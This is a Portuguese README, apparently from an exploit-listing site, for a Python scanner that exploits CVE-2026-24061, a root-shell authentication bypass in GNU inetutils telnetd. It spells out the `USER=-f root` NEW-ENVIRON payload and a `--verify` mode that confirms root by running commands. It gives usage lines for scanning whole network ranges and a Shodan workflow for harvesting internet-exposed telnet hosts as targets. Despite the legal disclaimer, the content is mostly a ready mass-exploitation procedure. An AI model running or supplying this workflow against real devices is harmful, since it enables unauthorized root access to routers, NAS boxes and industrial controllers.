## https://sploitus.com/exploit?id=6270028E-9445-57FF-99A0-F4C9EA4D3BAB
# CVE-2026-24061 Scanner – GNU inetutils telnetd Auth Bypass
**⚠️ AVISO LEGAL MUITO IMPORTANTE ⚠️**
Esta ferramenta é **exclusivamente para fins educacionais, pesquisa de segurança, análise de vulnerabilidades e testes autorizados**.
- Qualquer uso **não autorizado** contra sistemas que você não possui ou não tem permissão explícita por escrito é **crime** (no Brasil: art. 154-A do Código Penal + Lei 14.155/2021, entre outras legislações internacionais).
- Use **apenas** em ambientes próprios, laboratórios controlados ou durante pentests/red team com **RoE (Rules of Engagement)** assinado.
- O autor **não se responsabiliza** por qualquer uso indevido, dano, bloqueio de IP, consequências legais ou exploração maliciosa.
## Sobre a Vulnerabilidade (CVE-2026-24061)
- **Nome oficial**: GNU inetutils telnetd ≤ 2.7 – Authentication Bypass to Root Shell
- **CVSS**: 9.8 (Crítico)
- **Exploração**: Envio de `USER=-f root` (ou variações) via opção NEW-ENVIRON permite login imediato como root sem senha.
- **Afetados**: Dispositivos IoT, roteadores antigos, sistemas embarcados, NAS, DVRs, PLCs industriais que ainda usam **GNU inetutils telnetd** (versões ≤ 2.7).
- **Status em fevereiro 2026**: Em exploração ativa no wild (CISA KEV desde jan/2026, GreyNoise detectando tentativas diárias).
### Agradecimento especial
Este scanner só foi possível graças à excelente análise técnica e prova de conceito publicada pela equipe da **Hakai Security**.
O artigo detalhado deles forneceu as bases técnicas precisas sobre o vetor de exploração, os payloads reais e o comportamento do telnetd vulnerável.
→ Leia a análise completa aqui:
[https://hakaisecurity.io/cve-2026-24061-execucao-remota-de-codigo-no-telnetd-analise-tecnica-e-prova-de-conceito/research-blog/](https://hakaisecurity.io/cve-2026-24061-execucao-remota-de-codigo-no-telnetd-analise-tecnica-e-prova-de-conceito/research-blog/)
**Muito obrigado à Hakai Security** pela transparência, qualidade técnica e contribuição para a comunidade de segurança. Vocês ajudaram a tornar essa ferramenta mais precisa e útil para pesquisa responsável.
## Funcionalidades do Scanner
- Suporte a IPs individuais, CIDRs (/24, /16, etc.) e arquivos .txt com lista de alvos
- Detecção automática de classe IPv4 classful (A/B/C) com aviso para redes grandes
- Geração dinâmica de múltiplos payloads (-f root, -f admin, variações com --, -p, etc.)
- Lista de usuários customizável via `--users` (default inclui root, admin, pi, ubuntu, debian, etc.)
- Verificação real de root via `id` e `whoami` (--verify)
- Captura e exibição de banner Telnet (--banner)
- Detecção precoce de SSH na porta 23 (pula teste para evitar falsos positivos)
- Execução paralela (ajustável com `-w`)
- Saída colorida: **VERMELHO FORTE + "!!! VULNERÁVEL !!!"** para vulneráveis
- Tratamento gracioso de Ctrl+C
- Resultados salvos em JSON ordenados por IP
## Instalação
```bash
# Recomendado: use virtualenv
python3 -m venv venv-cve
source venv-cve/bin/activate
# Instale dependências
pip install telnetlib3 colorama
```
## Uso Básico
```# Scan em rede pequena com verificação
python3 scan-cve-2026-24061.py 192.168.1.0/24 --verify --banner -w 50
# Com lista de alvos (ex: Shodan)
python3 scan-cve-2026-24061.py alvos.txt -w 80 -t 6 --users root admin -o resultados.json
# Focado em root (mais rápido)
python3 scan-cve-2026-24061.py 10.0.0.0/24 --users root --verify --banner -t 5
# Dry-run (só lista IPs)
python3 scan-cve-2026-24061.py 206.42.41.0/24 --dry-run
```
## Como Obter Alvos (exemplo com Shodan CLI)
```# Instale shodan-cli
pip install shodan
# Inicialize com sua API Key
shodan init SUA_API_KEY_AQUI
# Baixe possíveis alvos
shodan download --limit 500 iot-gnu-telnet.json.gz 'port:23 ("GNU inetutils" OR "telnetd (GNU inetutils)") -ssh'
# Extrai IPs
shodan parse --fields ip_str iot-gnu-telnet.json.gz > alvos.txt
# Scan
python3 scan-cve-2026-24061.py alvos.txt --verify --banner
```
## Contribuições
Pull requests são bem-vindos, desde que mantenham o foco ético e reforcem avisos de responsabilidade.
Licença
MIT License – mas reforço: o uso não autorizado é de responsabilidade exclusiva do usuário.
Feito para estudo, conscientização e pesquisa de segurança.
⭐ Se achou útil, dê uma estrela!
🛡️ Use com extrema responsabilidade.
Made with ❤️ by killsystema